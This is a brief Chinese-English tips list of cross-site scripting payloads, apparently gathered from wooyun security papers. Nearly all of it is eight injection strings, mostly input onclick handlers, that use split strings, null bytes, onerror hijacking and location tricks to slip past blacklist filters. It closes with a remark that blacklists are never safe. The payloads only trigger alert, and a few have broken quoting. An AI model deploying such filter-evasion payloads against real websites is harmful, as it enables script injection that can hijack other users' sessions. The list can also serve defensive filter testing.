Some XSS Tips

• <input onclick="window.onerror=alert;throw 1">
• <input onclick="location="javascript:aler'+'t%2'+'81%2'+'9'">
• <input onclick="top.onerror=top['ale'+'rt'];throw 1">
• <input onclick="outerHTML=URL">
• "onblur=javascript:window.onblur=al%00ert;throw 1
• ()&xss="onclick=a=location.search;location.href="javascript:a"+"lert"+a[1]+a[2]//
• <input onclick="location=self.name">
• <input onclick="document.domain=''">

黑名单终归是不安全的。

Tips from:

• http://drops.wooyun.org/papers/894
• http://drops.wooyun.org/papers/512